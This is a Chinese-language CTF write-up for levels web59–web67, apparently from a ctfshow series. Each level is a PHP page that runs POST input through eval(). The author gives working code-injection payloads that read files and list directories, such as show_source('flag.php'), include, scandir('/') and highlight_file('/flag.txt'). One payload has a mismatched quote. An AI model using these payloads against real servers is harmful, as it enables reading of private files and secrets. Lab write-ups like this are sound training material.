web59
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
payload:c=show_source('flag.php');

我还是那句话:如果不知道对面过滤了啥,那就一个一个尝试
解释:在 PHP 中,show_source() 是一个内置函数,用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数,并将该文件的内容以文本形式进行输出。
下面是我的文章对命令执行常用语句的总结:来源于:一篇文章带你进阶CTF命令执行-CSDN博客
我不想太多,一个个丢进去,看那个可以就是那个

web60
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
这里还是上一个payload:
c=show_source('flag.php');
或者:c=highlight_file('flag.php');

web61
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
这题是真的离谱,这个payload已经一路过关斩将了
c=show_source('flag.php');
当然得换个绕法:
c=include('flag.php);echo $flag;
 这里是文件包含然后再输出变量
这里是文件包含然后再输出变量
web62
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
没错,又又又是那个payload,他还在输出!
c=show_source('flag.php');

web63
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
没错,又又又是那个payload,他还在输出!
c=show_source('flag.php');
 
web64
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
没错,又又又是那个payload,他还在输出!
c=show_source('flag.php');

web65
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
没错,又又又是那个payload,他还在输出!
c=show_source('flag.php');
web66
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
额,这波被制裁了,不能白嫖了,那就靠实力了!

c=print_r(scandir("/"));这里首先先翻看根目录,查看源代码,接着发现了flag.txt
c=highlight_file('/flag.txt');
知道flag在根目录下面的flag.txt直接访问就好了

web67
<?php
 /*
 # -*- coding: utf-8 -*-
 # @Author: Lazzaro
 # @Date:   2020-09-05 20:49:30
 # @Last Modified by:   h1xa
 # @Last Modified time: 2020-09-07 22:02:47
 # @email: h1xa@ctfer.com
 # @link: https://ctfer.com
 */
 // 你们在炫技吗?
 if(isset($_POST['c'])){
         $c= $_POST['c'];
         eval($c);
 }else{
     highlight_file(__FILE__);
 }
还是上面那道题目的方法:

payload:c=highlight_file('/flag.txt');
真诚希望我的文章能够帮助大家,谢谢!